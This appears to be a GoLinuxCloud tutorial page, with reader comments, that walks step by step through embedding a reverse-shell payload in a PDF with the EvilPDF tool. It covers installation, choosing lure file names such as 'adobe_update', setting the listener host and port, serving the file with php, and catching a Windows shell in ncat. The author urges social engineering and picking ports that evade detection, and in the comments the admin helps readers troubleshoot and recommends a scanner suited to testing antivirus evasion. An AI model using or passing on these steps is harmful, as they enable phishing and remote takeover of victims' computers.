Steps to embed payload in PDF [100% Working]

WRITTEN BY - KENNEDY MUTHII

Table of Contents
Pre-requisites

What you should know

Steps to embed payload in pdf with EvilPDF tool

Step 1: Installing EvilPDF tool

Step 2: Install required dependencies

Step 3: Running the evilpdf tool

Step 4: provide the path to the legitimate pdf

Step 5: Choosing the file to embed a payload on

Step 6: Choosing the name for the file.

Step 7: Setting the LHOST an the LPORT

Step 8: Setting the phishing url

Step 9: Delivering the pdf in order to gain a shell

Conclusion

Further Reading

Over the years the adobe reader has had a bunch of vulnerabilities which are exploited by the hackers.
Hackers embed payload in PDF which looks legitimate and maybe important in the eyes of the victim. One
factor that makes this hack successful is due to the fact that adobe reader is a common PDF reader in
computers around the world. Over time, Linux tools have been developed to embed payload in PDF with the
main focus being on simplifying the process of embedding the payload.
X
By the end of this guide, you will be able to embed payload in PDF, send it to the victim and gain access to
his/her machine remotely.

WARNING:

Hacking is an illegal activity and you can be charged in a court of law. Make sure you have a mutual
consent with the victim prior attacking his/her system. This guide is for education purposes only.

ALSO READ:

How to set up WordPress Reverse Shell [100% Working]

Pre-requisites

Have Kali Linux Operating system installed

Have target system as a virtual machine.
Have EvilPDF tool installed on your Kali Linux.

What you should know

Knowledge of using a terminal.

Have a legitimate PDF on which we will embed a payload
Have metasploit installed.(This is optional if you want to start the listener from the metasploit
terminal and generate custom payloads)

With that in mind, let’s jump right into our tutorial.

Steps to embed payload in pdf with EvilPDF tool X

This is a minimal tool made in python which is used to embed payload in PDF and launch the listener. The
creators of the tool focused on simplifying the process of launching the pdf attack.

Step 1: Installing EvilPDF tool

The first step is to clone the evilpdf repository from github. We will use the well known command to clone
the repository.

# git clone https://github.com/superzerosec/evilpdf

Cloning into 'evilpdf'...

remote: Enumerating objects: 8, done.

remote: Counting objects: 100% (8/8), done.

remote: Compressing objects: 100% (7/7), done.

remote: Total 8 (delta 0), reused 8 (delta 0), pack-reused 0

Unpacking objects: 100% (8/8), done.

Step 2: Install required dependencies

After the download is completed, we have to install the dependencies required for the tool to work without
running in errors.

cd evilpdf

Then install the required dependencies according to evilpdf tool official repository on github.

python -m pip install pypdf2

Advertisement
ADVERTISEMENT

X
 ADVERTISEMENT

Step 3: Running the evilpdf tool

We now run the evilpdf tool to start the process to embed payload in PDF.

python evilpdf.py

When we start the tool, it should look as shown in the screenshot below.

ALSO READ:

How to Inject Encoded Payload [Practical Examples]

  X
Step 4: provide the path to the legitimate pdf

As shown on the above screen, we have to provide a path to the legitimate pdf file on which we will embed
our payload. Make sure to use a pdf file of interest to the target. Ensure every aspect is compelling him/her
to open the file. You have to employ your social engineering skills here.

Step 5: Choosing the file to embed a payload on

On this step we will choose what kind of file we want to embed in a pdf. We can embed a custom file (If you
already generated the payload using metasploit you will just provide its path on your PC)

└─$ python3 evilpdf.py

 __________     .__.__ __________________  ___________

 \_   _____/__  _|__|  |\______   \______ \ \_   _____/

  |    __)_\  \/ /  |  | |     ___/|    |  \ |    __)   

  |        \\   /|  |  |_|    |    |    `   \|     \    

 /_______  / \_/ |__|____/____|   /_______  /\___  /    

         \/                               \/     \/     

 v1.1 coded by @linux_choice (twitter)

 github.com/thelinuxchoice/evilpdf

[+] PDF path (Default: adobe.pdf ): /home/toxic/Desktop/lifeguide.pdf

[+] Append custom file? [Y/n] n

Step 6: Choosing the name for the file.

In this step we have to chose a name to call the file. Once again, use words that will compel the victim to
download and run the file on his/her pc. In our case, we can call it adobe_update.

ALSO READ:

How to hack WiFi password [Step-by-Step]

X
 

Step 7: Setting the LHOST an the LPORT

This is where you are required to enter the host on which we will run the listener on. You can use the below
command to know your LHOST

ifconfig

Once you have set your host IP address, you will be required to choose the port to use. These configurations
of the port and the host are the ones to be used when after we embed payload in PDF. You should use a less
common port in order to ensure the success of your attack since the common ports are already being used
by existing services and any malicious activity on these ports will be easily detected.

X
 

Step 8: Setting the phishing url

When required to enter the phishing url on the next step, you can leave it as default as shown below and
wait as the evil too goes on with the process to embed payload in PDF. After embedding is over we just have
to start the listener. The url is the page where the victim will be redirected to as our payload exe downloads.

X
 

Advertisement

Step 9: Delivering the pdf in order to gain a shell X

Having completed the process to embed payload in a pdf, we now have to expose our server in order to
deliver the pdf in an easier way to the victim machine. Evilpdf gives us a guide on how to do that. In the
above screen you can see the command we are to use to expose the server. In our case we can use.

php -S 192.168.0.11:3333

Below is the output when we run the command on a terminal

$ php -S 192.168.0.11:3333

[Tue Nov  9 04:33:07 2021] PHP 7.4.15 Development Server (http://192.168.0.11:3333)

We can now navigate to our browser in the target machine and enter the provided link in order to download
our pdf which has the payload.

ALSO READ:

6 simple methods to check if ipv6 is enabled in Linux

Once the victim opens the PDF file which we named based on victims interests, it will next prompt for user
to confirm if they want to open the file.

X
 

Once the victim confirms this prompt, we will have a remote connection to the victim’s PC.

X
 

After the connection we get a shell as shown below

[+] Start Listener? [Y/n] y

[+] Listening connection:

Ncat: Version 7.80 ( org/ncat" >https://nmap>org/ncat )

Ncat: Listening on :::4444

Ncat: Listening on 0.0.0.0:4444

Ncat: Connection from 192.168.0.130.

Ncat: Connection from 192.168.0.130:54784.

Microsoft Windows [Version 10.0.18361.889]

(c) 2019 Microsoft Corporation. All rights reserved.

c:\Users\administrator\Downloads>dir

dir

Volume in drive C has no label.

Volume Serial Number is 7B9Y - 070D

Directory of C:\Users\administrator\Downloads

9/11/2021 4:24 AM <DIR> .

9/11/2021 4:24 AM <DIR> ..

9/11/2021 4:26 AM 20,983,845 (by-Adam-Grant)-Give-and-Take

Advertisement

X
Conclusion

In the above guide we were able to embed payload in PDF and run it on a victim machine gaining access to
the victim machine the same way hackers do in order to steal valuable information from the victims who fell
in our trap. For a person who does not understand the non-technical stuff, he/she can be lured to installing a
malware into his/her computer.

We recommend all the users to ensure their anti viruses and operating systems are up to date in order to
avoid being victims. Alternatively, they can choose to use other pdf readers which are more secure and also
ensure the pdf readers are up to date. With the help of processes such as obfuscation and other antivirus
evasion techniques, a hacker can get into your PC without raising any suspicion.

ALSO READ:

How to manage Pentest Projects with Cervantes?

Further Reading

Bypassing antivirus detection on a PDF exploit

Related Keywords: how to make pdf payload, msfvenom create pdf payload, msfvenom create pdf payload
android, undetectable pdf payload

pdf payload github, create malicious pdf, hide android payload in pdf, pdf payload metasploit termux

Ethical hacking, Kali Linux, Security

X
 Didn't find what you were looking for? Perform a quick search across GoLinuxCloud

Search …

If my articles on GoLinuxCloud has helped you, kindly consider buying me a coffee as a token of
appreciation.

For any other feedbacks or questions you can either use the comments section or contact me form.

Thank You for your support!!

22 thoughts on “Steps to embed payload in PDF [100% Working]”

whyudontcheck
november 12, 2021 at 11:49 am

404 not found repo lul

Reply

admin
november 12, 2021 at 12:48 pm

sorry about that, updated!

Reply

X
 200okstatushttps
november 12, 2021 at 3:52 pm

thx! now its ok

Reply

dimka
november 12, 2021 at 4:04 pm

python3 or python ?

Reply

admin
november 12, 2021 at 5:42 pm

It depends on which python you have installed.

Reply

hrutuj zode
august 31, 2022 at 10:04 am

Bro😭,

The git authentication was removed how do I install bro ?????

Reply

admin
august 31, 2022 at 10:05 pm
X
 I didn’t get you, which authentication?

Reply

noname
january 4, 2023 at 3:42 pm

dear one method you can install the clone but clone authentication error no problem you can install
zip file and extract then use it

Reply

craig
november 22, 2022 at 11:45 am

SyntaxError: invalid syntax

Reply

craig
november 22, 2022 at 12:06 pm

[1;31m___________ .__.__ [1;93m__________________ ___________ [0m

[1;31m\_ _____/__ _|__| |[1;93m\______ \______ \ \_ _____/ [0m

[1;31m | __)_\ \/ / | |[1;93m | ___/| | \ | __) [0m

[1;77m | \\ /| | |_| | | ` \| \ [0m

[1;77m/_______ / \_/ |__|____/____| /_______ /\___ / [0m

[1;77m \/ \/ \/ [0m

[1;77mv1.1 coded by @linux_choice (twitter)

[1;77mgithub.com/thelinuxchoice/evilpdf[0m

Traceback (most recent call last):

File "C:\Users\Administrator\Desktop\evilpdf.py", line 246, in

dependencies()
X
File "C:\Users\Administrator\Desktop\evilpdf.py", line 19, in dependencies

 os.system('command -v base64 > /dev/null 2>&1 || { echo >&2 "Install base64";

^^

NameError: name 'os' is not defined

Reply

admin
december 12, 2022 at 2:56 pm

“You are trying to run the tool on Windows. Check this article https://www.golinuxcloud.com/setup-
virtual-penetration-testing-lab/ on how to run Linux on a virtual box”

Reply

anil
november 25, 2022 at 5:28 am

can you make pdf payload for Android full process

Reply

admin
december 12, 2022 at 2:58 pm

Hi Anil,

You can check on how to hack android remotely using L3MON

https://www.golinuxcloud.com/l3mon-hack-android-mobile-remotely/

Reply

tarifreeman
X
december 11, 2022 at 7:22 am
Hi, when I start the php command when I go to the website I have : “404 not found” why??

Reply

admin
december 12, 2022 at 2:57 pm

Hi,

Please paste the error generated

Reply

jhj
december 11, 2022 at 9:59 pm

nice

Reply

tnt
december 21, 2022 at 11:31 pm

Hello, Thank you for that Tutorial. I was able to create everything and when I’m executing the complete
command php -S 0.0.0.0:3333 & \ & ssh -R 80:localhost:3333 etc….. I’m getting the link that I must use
and when using that link I’m able to download the file but when opening it nothing happen and my
listener is on. Would you have a hint ? Do I absolutely need to open the file with Adobe reader ? Or If I
open it in linux for example it should work ?

Thank you

Reply X
 tnt
december 21, 2022 at 11:45 pm

I also tried to open the .pdf with my Android cell phone and it’s also not working.

Reply

admin
december 23, 2022 at 11:26 am

Hello, you have to open the pdf using Adobe Reader on a windows pc.

Reply

rafael
january 25, 2023 at 1:10 pm

Great tutorial. If I just want to work with the payload, the pdf file to analyze it and using pdfcop I get a
hash that I insert into virustotal but the hash does not have matches in virustotal so it does not tell me
that the file is infected? Is there a way to analyze this file in a different way to see the payload in the PDF
file?

Reply

admin
january 25, 2023 at 4:35 pm

You can use https://antiscan.me/ to scan the PDF file.

Reply

X
 rafael araya
january 25, 2023 at 9:52 pm

Much appreciated.

Reply

Leave a Comment

Name *

Email *

Save my name and email in this browser for the next time I comment.

Notify me via e-mail if anyone answers my comment.

Post Comment

Sitemap Privacy Policy Disclaimer Contact

Copyright © 2023 | Hosted On Rocket.net